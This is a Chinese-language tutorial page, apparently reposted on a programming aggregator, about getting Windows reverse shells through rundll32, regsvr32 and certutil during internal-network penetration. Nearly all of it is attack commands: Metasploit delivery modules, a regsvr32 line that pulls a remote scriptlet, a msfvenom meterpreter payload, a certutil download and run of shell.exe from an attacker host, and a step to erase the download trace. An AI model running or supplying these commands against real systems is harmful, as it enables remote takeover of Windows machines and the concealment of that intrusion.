概述
内网渗透之Windows反弹shell(二)(03Rundll32.exe、04Regsvr32.exe、05Certutil.exe),下方主要介绍关于内网渗透之Windows反弹shell(二)的全文内容,希望对你有所帮助。windows反弹shell
03rundll32.exe
rundll32.exe与windows操作系统相关,它允许调用从DLL导出的函数(16位或32位),并将其储存在适当的内存库中。
通过Metasploit的SMB Delivery模块发起rundll32攻击
use exploit/windows/smb/smb_delivery
set srvhost 192.168.1.121
exploit -j
被控端执行
rundll32.exe \\192.168.1.121\qFMnFO\test.dll,0
反弹成功
04Regsvr32.exe
Regsvr32.exe是一个命令行应用程序,用于注册和注销olE控件,如windows注册表中的dll和ActiveX控件。
Regsvr32.exe安装在windows XP和windows后续版本的 %systemroot%\System32 文件夹中。
语法:Regsvr32 [/s][/u][/n][/i[:cmdline]] <dllname>
/u - 注销服务器
/i - 调用Dllinstall传递一个可选的[cmdline];当它与/u一起使用时·它调用dll来卸载
/n - 不要调用DllRegisterServer;此选项必须与/i一起使用
通过msf的Web Delivery模块启动Regsvr32.exe
use exploit/multi/script/web_delivery
set srvhost 192.168.1.121
set target 3
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.121
exploit –j
被控端执行
regsvr32 /s /n /u /i:http://192.168.1.121:8080/yvj3GKJwvde.sct scrobj.dll
反弹成功
05Certutil.exe
Certutil.exe是作为证书服务的一部分安装的命令行程序。 我们可以使用此工具在目计算机中执行恶意的exe文件以获得meterpreter会话。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.121 lport=6666 -f exe > shell.exe
certutil.exe -urlcache -split -f http://192.168.1.121:8000/shell.exe shell.exe
./shell.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.121
set lport 6666
exploit
清除日志
certutil.exe -urlcache -split -f http://192.168.1.121:8000/shell.exe delete
总结
以上是编程之家为你收集整理的内网渗透之Windows反弹shell(二)全部内容,希望文章能够帮你解决内网渗透之Windows反弹shell(二)所遇到的程序开发问题。
如果觉得编程之家网站内容还不错,欢迎将编程之家网站推荐给程序员好友。